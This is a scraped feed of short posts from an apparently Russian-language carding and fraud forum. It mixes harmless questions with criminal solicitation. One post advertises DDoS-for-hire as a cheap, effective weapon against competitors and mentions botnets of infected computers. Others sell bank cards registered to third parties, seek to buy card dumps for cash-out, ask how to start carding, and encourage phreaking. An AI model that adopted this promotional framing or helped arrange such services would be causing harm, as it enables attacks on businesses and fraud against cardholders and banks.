    Полностью согласен и поддерживаю!
  34. 1 балл
    Нужен софт+дрова на MRS605 под ubuntu или linux У кого есть поделитесь
  35. 1 балл
  36. 1 балл
    я с таким же вопросом, перечитал и пересмотрел многое, но все равно что то не получается, хотел бы проконсультироватся по этому поводу)
  37. 1 балл
    Надоели конкуренты? — закажи DDOS услуги! Для начала давайте разберемся что же такое DDoS и как это может помочь в борьбе с конкурентами. DDoS-атака (Denial of Service) — целенаправленная атака на информационный ресурс с целью выведения ее из строя. Простыми словами создается чрезмерно высокая нагрузка на сервер на котором расположен сайт вашего конкурента, что приводит к его «падению». Вследствие чего клиенты не могут получить доступ к ресурсу вашего конкурента. Одним из видов DDos услуг является HTTP-флуд — генерация массового потока запросов с различных персональных компьютеров. При такой атаке нагрузка ложиться на память, процессор и канал связи. Вы спросите откуда берутся эти компьютеры, все просто — их компьютеры заражаются вирусным кодом при установке приложений содержащих его. Другой вид Dos-атак называется Smurf-атака — это пожалуй самая опасная атака, после нее практически со 100% гарантией произойдет отказ в обслуживании. Также существуют ddos услуги которые направлены на выявление и использование «дыр» в программном обеспечении для критического изменения конфигурации системы. В любом случае результатом будет доведение ресурса конкурента до нерабочего состояния. В настоящее время заказать ddos услуги совсем не сложно, стоят они не так уж дорого и являются эффективным средством конкурентной борьбы в сети интернет.
  38. 1 балл
    В наличии:Росбанк виза голд-5000 рублей,Тинькофф-4000 рублей,Кукуруза-2000 рублей.Карты оформлены в Москве.Писать в л/с.
  39. 1 балл
    В принципе туда оно и адресованно , только необходима поддержка
  40. 1 балл
    А если не выдают кассовый чек под предлогом того, что касса вышла из строя (или закончилась бумага), выданная рукописная квитация будет иметь силу? И если да, то как она должна быть оформлена?
  41. 1 балл
    Всем доброго времени суток! Срочно куплю или возьму под обнал дампы!
  42. 1 балл
    в вю, это может быть и реверс, а по банкам в зависимости от банка и онлайна.
  43. 1 балл
  44. 1 балл
    wimax на дропа (т.к 3g можно запилинговать) вот и все дела
  45. 1 балл
    бабки для штрафов печатаешь?
  46. 1 балл
    Полюбому кто-то из знакомых (кто знает чем ты занимаешься) разыграл тебя . Менты не будут звонить , предупреждать что мол все о вас знаем , скоро зайдем - ждите , не уходите )
  47. 1 балл
    Профессора кардинга, подскажите по своему опыту, как влиться в эту тему? А то я исключительно с мошенниками связывался, был опрокинут, конечно, не на тыщи баков, но неприятно было потерять несколько килоруб!!!!
  48. 1 балл
    Где ваша книга жалоб? В один из британских банков утром вломился грабитель, потребовал денег и оказалось, что наличных в кассе попросту нет! Он очень расстроился, взял книгу жалоб и написал жалобу на отсутствие денег После чего сел в машину и уехал. Естественно, за это время к банку подтянулась полиция, сотрудники которой не дали грабителю далеко уехать и задержали. Сотрудники банка, видеокамеры и экспертиза почерка стали железными уликами, и теперь 48-летнему Джозефу Гетзу придется писать жалобы в тюрьме.
  49. 1 балл
    брильянтовая рука, классика)))
  50. 1 балл
    А конкретно тебе никто и не скажет, люди делают деньги, если все начнут делать на этом деньги - баг найдут и устранят... Сколько случаев я знаю, например сидит оператор и по тихой сливает бабки со счетов клиентов опсоса, ну например по 1-2р, потом по 10, а потом находит тех у кого баланс например 250 000р насотовом, ну и мысли появляются, а возьму ка я сотку, не лучше шт уку, один хер у него их 250, он и не заметит, а потом терпила приходит к администрации и говорит что у него спиздили деньги, всё заканчивается судимостью! Жадность фраера, ну дальше вы знаете... Поэтому ищите свои способы, открывайте новые направления фрикинга!
×
×
  • Создать...